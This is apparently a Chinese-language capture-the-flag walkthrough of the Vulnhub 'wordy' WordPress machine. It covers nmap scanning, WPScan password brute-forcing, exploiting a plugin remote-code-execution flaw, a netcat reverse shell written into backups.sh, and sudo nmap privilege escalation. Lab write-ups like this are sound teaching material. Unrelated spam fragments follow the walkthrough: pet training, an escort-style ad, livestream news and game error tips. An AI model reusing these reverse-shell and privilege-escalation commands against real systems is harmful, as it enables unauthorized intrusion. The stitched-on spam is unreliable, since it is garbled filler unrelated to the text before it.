Vulnhub提示:
扫描靶机IP地址:nmap -sP 192.168.10.0/24
扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129
开放端口22,80
访问80端口发现URL被重定向到wordy
我们需要在host文件中添加
文件位置 /etc/hosts
可以访问到啦
扫描下目录结构吧,
御剑扫描
发现是wordpress站点
使用WPscan扫描
一款专注于wordpress站点扫描工具
wpscan -url wordy
顺便枚举一下用户
站点没发现什么漏洞,暴力破解尝试下
root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt
破解很久没获取密码,这时候想起Vulnhub重要提示
root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
使用这个字典在尝试下暴力破解
root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt
获得密码
mark
helpdesk01
登录后台发现Activity on Wordy插件存在远程代码执行漏洞
利用远程代码执行命令漏洞步骤:
step1:打开burpsuite工具设置 ***
step2:
step3:发送到重写模块
step4:kali打开端口监听
step5:利用成功获取到webshell
横向移动搜寻可以利用的信息
成功找到了graham的密码信息
查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本
如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell
echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh
kali 端监听 8888 端口
sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的
jens用户可以以 root权限执行 nmap nmap 提权分为两种
旧版本上以进入交互提权
# 进入nmap的交互模式 nmap --interactive # 执行sh,提权成功 !sh
新版本
echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF
养宠物狗狗的家庭,往往会对狗狗进行训练,只是难易程度不同而已。一般小型玩赏犬的训练很简单,都是肢体上的简单动作,如握手、作揖、飞吻等,而大型犬的训练项目就很多了,如接飞盘等。狗狗训练时需要的狗狗用品你...
戏精上美院系花兼职商务第2部一边看球一边玩身,今天大前天昨天一个月前明天一个星期前一年前昨天一个月前前天在线预约了一个“第一商务预约网依照预订的服务要出来用餐学好。来源于贵阳市的那位漂亮小姐姐现场帮我...
本文导读目录: 1、冰心的《繁星》中一角的城墙 蔚蓝的天 极目的苍茫无际—— 即此便是天上一人间的评价 2、诗篇119怎样分段去读经更为明白我带领弟兄姐妹读经,由于太长,分段读,能更明白 3、...
“歌神”陈奕迅入驻抖音后的首场“Shall we talk” 可视电台直播秀落下帷幕,获得超过3700W人次在线观看、近8000W点赞!11月21日晚八点,Eason一身红毛衣造型闪亮出场,和帮忙众筹...
针对刚外入社会发展的九零后而言,大多数都利欲熏心,想给这世界漂亮。她们期盼取得成功期盼证实自身,早就跃跃欲试,想与这世界来一场交锋。下边我给90后创业者一些新项目提议。 1.娱乐平台地 最先,对于...
vac无法验证您的游戏对话(vac无法验证您的游戏对话如何解决)近期有win7最新版本系统软件客户在电脑上中玩csgo手机游戏的情况下,体现说碰到提醒vac无法验证您的游戏对话,该如何解决那样的难...